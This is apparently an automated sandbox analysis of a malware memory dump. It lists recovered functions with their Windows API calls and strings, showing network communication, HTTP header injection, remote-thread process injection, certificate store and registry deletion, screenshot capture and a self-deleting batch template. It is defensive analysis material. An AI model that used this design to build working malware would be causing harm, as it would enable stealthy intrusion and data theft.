lstrcmpiW.KERNEL32(?), ref: 00CD99DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CD99AD

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 00CF27C1: socket.WS2_32(?,?,00000006), ref: 00CF27F5

connect.WS2_32(?,?), ref: 00CF2B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00CF2B89
WSASetLastError.WS2_32(?), ref: 00CF2BE7

Part of subcall function 00CF2968: shutdown.WS2_32(?,00000002), ref: 00CF2976
Part of subcall function 00CF2968: closesocket.WS2_32(?), ref: 00CF297F
Part of subcall function 00CF2968: WSACloseEvent.WS2_32(?), ref: 00CF2992

Part of subcall function 00CF2917: WSACreateEvent.WS2_32(00000000,?,00CF2C15,?,00000000,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF292D
Part of subcall function 00CF2917: WSAEventSelect.WS2_32(?,?,00CF2CD1), ref: 00CF2943
Part of subcall function 00CF2917: WSACloseEvent.WS2_32(?), ref: 00CF2957

WSASetLastError.WS2_32 ref: 00CF2BA7
WSAGetLastError.WS2_32 ref: 00CF2BA9

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(00D03510), ref: 00CD17B1

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

InitializeCriticalSection.KERNEL32 ref: 00CD17C6
memset.MSVCRT ref: 00CD17DB
TlsAlloc.KERNEL32(?,00000000,00CE4986,?,?,00000001), ref: 00CD17F2
GetModuleHandleW.KERNEL32(?), ref: 00CD1817

Part of subcall function 00CD8DB0: EnterCriticalSection.KERNEL32(00D03510,00F51E90,00CD1829,?,00000000,00CE4986,?,?,00000001), ref: 00CD8DC0
Part of subcall function 00CD8DB0: LeaveCriticalSection.KERNEL32(00D03510,?,00000000,00CE4986,?,?,00000001), ref: 00CD8DE8

Part of subcall function 00CD1857: TlsFree.KERNEL32(?), ref: 00CD1863
Part of subcall function 00CD1857: DeleteCriticalSection.KERNEL32(00F51E90,00000000,00CD1851,00F51E90,?,00000000,00CE4986,?,?,00000001), ref: 00CD186A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE0799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE07CF

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

lstrcatW.KERNEL32(?,.dat), ref: 00CE082F
lstrlenW.KERNEL32 ref: 00CE0844

Part of subcall function 00CD1AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00CD1ACA
Part of subcall function 00CD1AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CD1AED
Part of subcall function 00CD1AAE: CloseHandle.KERNEL32 ref: 00CD1AFA

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00CE07F0
.dat, xrefs: 00CE0823

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF07DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,00CC6FA4,00000004), ref: 00CF0805

Part of subcall function 00CE6FD3: EnterCriticalSection.KERNEL32(00D03510,?,00CE4693,?,00CE49A5,?,?,00000001), ref: 00CE6FE3
Part of subcall function 00CE6FD3: LeaveCriticalSection.KERNEL32(00D03510,?,00CE4693,?,00CE49A5,?,?,00000001), ref: 00CE7009

GetAcceptLanguagesA.SHLWAPI ref: 00CF084C
memcpy.MSVCRT ref: 00CF0886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 00CF08BF

Strings

Accept-Language: , xrefs: 00CF0880

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCAD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 00CE6FD3: EnterCriticalSection.KERNEL32(00D03510,?,00CE4693,?,00CE49A5,?,?,00000001), ref: 00CE6FE3
Part of subcall function 00CE6FD3: LeaveCriticalSection.KERNEL32(00D03510,?,00CE4693,?,00CE49A5,?,?,00000001), ref: 00CE7009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CCADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 00CCADB3
GetSystemDefaultUILanguage.KERNEL32(?,00CCAA9B), ref: 00CCADEE

Strings

kernel32.dll, xrefs: 00CCAD9E
GetProductInfo, xrefs: 00CCADAD

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF5D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 00CF5D3A
lstrcpyA.KERNEL32(?,00CC939A,00000000,00CF5FC9,?,?,?,00CF5FC9,?,?,?,?,?,?,?,00CDBD61), ref: 00CF5DD1
lstrcpynA.KERNEL32(?,?\C,00000003,?,00CC939A,00000000,00CF5FC9,?,?,?,00CF5FC9,?), ref: 00CF5DE7

Strings

?\C, xrefs: 00CF5DDC

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCD2F7, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 77

APIs

VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00CCD315
VerQueryValueW.VERSION(?,?,?,?), ref: 00CCD382

Part of subcall function 00CF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00CF3C98
Part of subcall function 00CF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00CF3CA2

Strings

\VarFileInfo\Translation, xrefs: 00CCD30A
\StringFileInfo\%04x%04x\%s, xrefs: 00CCD357

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD332C, Relevance: 8.2, APIs: 2, Strings: 2, Instructions: 44

APIs

GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00CD3341
GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00CD334C

Part of subcall function 00CD338D: GetProcAddress.KERNEL32(?,GdipGetImageEncodersSize), ref: 00CD33AB
Part of subcall function 00CD338D: GetProcAddress.KERNEL32(?,GdipGetImageEncoders), ref: 00CD33B6
Part of subcall function 00CD338D: GetProcAddress.KERNEL32(?,GdipSaveImageToStream), ref: 00CD33C1
Part of subcall function 00CD338D: lstrcmpiW.KERNEL32(?), ref: 00CD344E
Part of subcall function 00CD338D: memcpy.MSVCRT ref: 00CD3471
Part of subcall function 00CD338D: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CD349C
Part of subcall function 00CD338D: memcpy.MSVCRT ref: 00CD34CA

Strings

GdipCreateBitmapFromHBITMAP, xrefs: 00CD333A
GdipDisposeImage, xrefs: 00CD3343

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCCD5A, Relevance: 7.9, APIs: 5, Instructions: 109

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1), ref: 00CCCD70
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1), ref: 00CCCE9F

Part of subcall function 00CCF0E1: memcmp.MSVCRT ref: 00CCF0FD

memcpy.MSVCRT ref: 00CCCDCD
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1,?,00000002), ref: 00CCCDDD

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00CCCE11

Part of subcall function 00CED95F: GetSystemTime.KERNEL32(?), ref: 00CED969

Part of subcall function 00CCEDAE: memcpy.MSVCRT ref: 00CCEDF9

Part of subcall function 00CCEEE2: memcpy.MSVCRT ref: 00CCEFC1
Part of subcall function 00CCEEE2: memcpy.MSVCRT ref: 00CCEFE2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE6C9A, Relevance: 7.9, APIs: 5, Instructions: 252

APIs

memcmp.MSVCRT ref: 00CE6D07
memcpy.MSVCRT ref: 00CE6E14

Part of subcall function 00CF2B3C: connect.WS2_32(?,?), ref: 00CF2B7A
Part of subcall function 00CF2B3C: WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00CF2B89
Part of subcall function 00CF2B3C: WSASetLastError.WS2_32 ref: 00CF2BA7
Part of subcall function 00CF2B3C: WSAGetLastError.WS2_32 ref: 00CF2BA9
Part of subcall function 00CF2B3C: WSASetLastError.WS2_32(?), ref: 00CF2BE7

memcmp.MSVCRT ref: 00CE6F11

Part of subcall function 00CF2EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00CCFD6D,?,00000004,00007530,?,?,?,?), ref: 00CF2ED9
Part of subcall function 00CF2EA3: WSASetLastError.WS2_32(?), ref: 00CF2F21

Part of subcall function 00CE6A51: memcmp.MSVCRT ref: 00CE6A97

Part of subcall function 00CE5D47: memset.MSVCRT ref: 00CE5D57
Part of subcall function 00CE5D47: memcpy.MSVCRT ref: 00CE5D80

memset.MSVCRT ref: 00CE6F76
memcpy.MSVCRT ref: 00CE6F87

Part of subcall function 00CE5D97: memcpy.MSVCRT ref: 00CE5DA8

Part of subcall function 00CE69A2: memcmp.MSVCRT ref: 00CE69DE

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCD6C8, Relevance: 7.9, APIs: 5, Instructions: 86

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00CCD979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00CCD6D2
memcpy.MSVCRT ref: 00CCD74E
memcpy.MSVCRT ref: 00CCD762
memcpy.MSVCRT ref: 00CCD78C
LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00CCD979,00000001,?,00000000,?,?,?,00000000), ref: 00CCD7B2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5A4F, Relevance: 7.8, APIs: 4, Instructions: 27

APIs

GetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A51

Part of subcall function 00CE4B8D: WaitForSingleObject.KERNEL32(00000000,00CD63B6), ref: 00CE4B95

TlsGetValue.KERNEL32(?,?,00CCB9B4), ref: 00CD5A6E
TlsSetValue.KERNEL32(00000001), ref: 00CD5A80
SetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A90

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEB562, Relevance: 7.8, APIs: 5, Instructions: 133

APIs

memset.MSVCRT ref: 00CEB587
memcpy.MSVCRT ref: 00CEB5E7
memcpy.MSVCRT ref: 00CEB5FF

Part of subcall function 00CC9F94: memset.MSVCRT ref: 00CC9FA8

Part of subcall function 00CDBD8C: memset.MSVCRT ref: 00CDBE17

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00CEB66A
memcpy.MSVCRT ref: 00CEB6A8

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6D60, Relevance: 7.8, APIs: 4, Instructions: 68

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00CD6D88
recv.WS2_32(?,?,00000400,00000000), ref: 00CD6DB4
send.WS2_32(?,?,?,00000000), ref: 00CD6DD6
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00CD6E03

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCC907, Relevance: 7.8, APIs: 4, Instructions: 66

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,00000001,?,00000000,00CCCB5E,?), ref: 00CCC961
LeaveCriticalSection.KERNEL32(?,?,?,00000002,00000001,?,00000000,00CCCB5E,?), ref: 00CCC9C9

Part of subcall function 00CCC3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CCC404

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

InterlockedIncrement.KERNEL32 ref: 00CCC99E
SetEvent.KERNEL32 ref: 00CCC9BC

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5B40, Relevance: 7.7, APIs: 4, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(?,7C809F91,?,00CCD091,?,?,00000000,0000EA60,00000000), ref: 00CD5B48
WaitForSingleObject.KERNEL32(?,00000000), ref: 00CD5B6C
CloseHandle.KERNEL32 ref: 00CD5B7C

Part of subcall function 00CD69C9: HeapAlloc.KERNEL32(00000000,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?,?,?), ref: 00CD69F3
Part of subcall function 00CD69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?), ref: 00CD6A06

LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00CCD091,?,?,00000000,0000EA60,00000000), ref: 00CD5BAC

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD8459, Relevance: 7.7, APIs: 4, Instructions: 207

APIs

EnterCriticalSection.KERNEL32(00F5282C,3D920700), ref: 00CD84C0

Part of subcall function 00CD81D6: GetTickCount.KERNEL32 ref: 00CD81DE

LeaveCriticalSection.KERNEL32(00F5282C), ref: 00CD869F

Part of subcall function 00CD8339: IsBadReadPtr.KERNEL32 ref: 00CD8405
Part of subcall function 00CD8339: IsBadReadPtr.KERNEL32 ref: 00CD8424

getservbyname.WS2_32(?,00000000), ref: 00CD853A

Part of subcall function 00CD8A90: memcpy.MSVCRT ref: 00CD8C64
Part of subcall function 00CD8A90: memcpy.MSVCRT ref: 00CD8D64

Part of subcall function 00CD8770: memcpy.MSVCRT ref: 00CD8944
Part of subcall function 00CD8770: memcpy.MSVCRT ref: 00CD8A44

memcpy.MSVCRT ref: 00CD8619

Part of subcall function 00CF2471: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00D02910,?,?), ref: 00CF249E

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD8162: TlsAlloc.KERNEL32(00F5282C,00CD8636,?,?,?,?,00F52820,?), ref: 00CD816B
Part of subcall function 00CD8162: TlsGetValue.KERNEL32(?,00000001,00F5282C), ref: 00CD817D
Part of subcall function 00CD8162: TlsSetValue.KERNEL32(?,?), ref: 00CD81C2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5E12, Relevance: 7.7, APIs: 5, Instructions: 68

APIs

EnterCriticalSection.KERNEL32(00D03510), ref: 00CD5E33
LeaveCriticalSection.KERNEL32(00D03510), ref: 00CD5E59

Part of subcall function 00CD5DBC: InitializeCriticalSection.KERNEL32(00D03648), ref: 00CD5DC1
Part of subcall function 00CD5DBC: memset.MSVCRT ref: 00CD5DD0

EnterCriticalSection.KERNEL32(00D03648), ref: 00CD5E64
LeaveCriticalSection.KERNEL32(00D03648), ref: 00CD5EDC

Part of subcall function 00CCA509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CCA54A
Part of subcall function 00CCA509: PathRenameExtensionW.SHLWAPI(?,?), ref: 00CCA59B

Part of subcall function 00CCA5B2: memset.MSVCRT ref: 00CCA757
Part of subcall function 00CCA5B2: memcpy.MSVCRT ref: 00CCA780
Part of subcall function 00CCA5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00CCA885
Part of subcall function 00CCA5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CCA8A1

Sleep.KERNEL32(000007D0), ref: 00CD5ECF

Part of subcall function 00CCA947: memset.MSVCRT ref: 00CCA969

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDF7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 00CDF838
GetProcAddress.KERNEL32(?,?), ref: 00CDF860
StrChrA.SHLWAPI(?,00000040), ref: 00CDF987

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 00CDF968

Part of subcall function 00CEC3E0: lstrlenW.KERNEL32(00CC7C5C), ref: 00CEC3FC
Part of subcall function 00CEC3E0: lstrlenW.KERNEL32(?), ref: 00CEC402
Part of subcall function 00CEC3E0: memcpy.MSVCRT ref: 00CEC426

FreeLibrary.KERNEL32 ref: 00CDFA6D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CECB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 00CECD50

Part of subcall function 00CECB99: memcpy.MSVCRT ref: 00CECBB0
Part of subcall function 00CECB99: CharLowerA.USER32 ref: 00CECC7B
Part of subcall function 00CECB99: CharLowerA.USER32(?), ref: 00CECC8B

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 00CF2DBA: WSAGetLastError.WS2_32 ref: 00CF2DF0
Part of subcall function 00CF2DBA: WSASetLastError.WS2_32(00002775), ref: 00CF2E54

memcmp.MSVCRT ref: 00CD2038
memcmp.MSVCRT ref: 00CD2050
memcpy.MSVCRT ref: 00CD2085

Part of subcall function 00CEF70B: memcpy.MSVCRT ref: 00CEF718

Part of subcall function 00CEF8BA: memcpy.MSVCRT ref: 00CEF8E7

Part of subcall function 00CCFF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,00CD2175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00CCFF57
Part of subcall function 00CCFF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,00CD2175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00CCFF7B

Part of subcall function 00CD1F85: GetTickCount.KERNEL32 ref: 00CD1F92

Part of subcall function 00CF2AB4: memset.MSVCRT ref: 00CF2AC9
Part of subcall function 00CF2AB4: getsockname.WS2_32(?,00CCC22C,?), ref: 00CF2ADC

Part of subcall function 00CF306E: memcmp.MSVCRT ref: 00CF3090

Part of subcall function 00CE6C9A: memcmp.MSVCRT ref: 00CE6D07
Part of subcall function 00CE6C9A: memcpy.MSVCRT ref: 00CE6E14
Part of subcall function 00CE6C9A: memcmp.MSVCRT ref: 00CE6F11
Part of subcall function 00CE6C9A: memset.MSVCRT ref: 00CE6F76
Part of subcall function 00CE6C9A: memcpy.MSVCRT ref: 00CE6F87

Strings

GET , xrefs: 00CD2032
POST , xrefs: 00CD204A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD65F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 00CD5D25: memset.MSVCRT ref: 00CD5D35

lstrlenA.KERNEL32(?,?,?), ref: 00CD66BC
lstrlenA.KERNEL32(?), ref: 00CD66CF

Part of subcall function 00CECB99: memcpy.MSVCRT ref: 00CECBB0
Part of subcall function 00CECB99: CharLowerA.USER32 ref: 00CECC7B
Part of subcall function 00CECB99: CharLowerA.USER32(?), ref: 00CECC8B
Part of subcall function 00CECB99: memcpy.MSVCRT ref: 00CECD50

Part of subcall function 00CD6AE4: memcpy.MSVCRT ref: 00CD6AF7

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Strings

?*, xrefs: 00CD66B1
:, xrefs: 00CD670A
:, xrefs: 00CD6731

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDD9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 00CD5A4F: GetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A51
Part of subcall function 00CD5A4F: TlsGetValue.KERNEL32(?,?,00CCB9B4), ref: 00CD5A6E
Part of subcall function 00CD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00CD5A80
Part of subcall function 00CD5A4F: SetLastError.KERNEL32(?,?,00CCB9B4), ref: 00CD5A90

GetProcessId.KERNEL32(?), ref: 00CDDA83

Part of subcall function 00CEBE5A: CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CEBEA0
Part of subcall function 00CEBE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00CEBEAC
Part of subcall function 00CEBE5A: CloseHandle.KERNEL32 ref: 00CEBEBA

Part of subcall function 00CCFBD5: TlsGetValue.KERNEL32(?,?,00CDD975), ref: 00CCFBDE

Part of subcall function 00CE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4A89
Part of subcall function 00CE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4AC4
Part of subcall function 00CE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B04
Part of subcall function 00CE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B27
Part of subcall function 00CE4A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CE4B77

GetThreadContext.KERNEL32 ref: 00CDDAE5
SetThreadContext.KERNEL32(?,?), ref: 00CDDB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CDDB3B
CloseHandle.KERNEL32(?), ref: 00CDDB45

Part of subcall function 00CD5AD5: GetLastError.KERNEL32(?,00CCBA1E), ref: 00CD5AD6
Part of subcall function 00CD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00CD5AE6
Part of subcall function 00CD5AD5: SetLastError.KERNEL32(?,?,00CCBA1E), ref: 00CD5AED

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCC77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 00CCF1A8: EnterCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1B8
Part of subcall function 00CCF1A8: LeaveCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1E2

memset.MSVCRT ref: 00CCC7BC
memset.MSVCRT ref: 00CCC7C8
memset.MSVCRT ref: 00CCC7D4
InitializeCriticalSection.KERNEL32 ref: 00CCC7EC
InitializeCriticalSection.KERNEL32 ref: 00CCC807
InitializeCriticalSection.KERNEL32 ref: 00CCC844

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00CE0734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 00CE0745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 00CE0750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00CE0758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00CE0766

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCDB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(?), ref: 00CCDB95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CCDBA6
CloseHandle.KERNEL32(?), ref: 00CCDBAF
CloseHandle.KERNEL32(?), ref: 00CCDBBE

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

DeleteCriticalSection.KERNEL32(00F527E8,?,00CCDB81,00F527E8), ref: 00CCDBD5

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE10E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 00CE0D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00CE0D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CE113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00CE11A5
RegFlushKey.ADVAPI32(00000000), ref: 00CE11D3
RegCloseKey.ADVAPI32(00000000), ref: 00CE11DA

Part of subcall function 00CE1051: EnterCriticalSection.KERNEL32(00D03510,?,?,00000000,00CE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00CE1067
Part of subcall function 00CE1051: LeaveCriticalSection.KERNEL32(00D03510,?,?,00000000,00CE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00CE108F
Part of subcall function 00CE1051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00CE10AB
Part of subcall function 00CE1051: GetProcAddress.KERNEL32 ref: 00CE10B2
Part of subcall function 00CE1051: RegDeleteKeyW.ADVAPI32(?,?), ref: 00CE10D4

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Part of subcall function 00CE0D19: RegFlushKey.ADVAPI32 ref: 00CE0D29
Part of subcall function 00CE0D19: RegCloseKey.ADVAPI32 ref: 00CE0D31

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00CCB41A,?), ref: 00CD9F69

Part of subcall function 00CF07B1: CoCreateInstance.OLE32(00CC17F8,00000000,00004401,00CC1858,?), ref: 00CF07C6

#2.OLEAUT32(00CCB41A,00000000,?,?,?,00CCB41A,?), ref: 00CD9F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CCB41A,?), ref: 00CD9FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00CD9FF2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE575A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 68

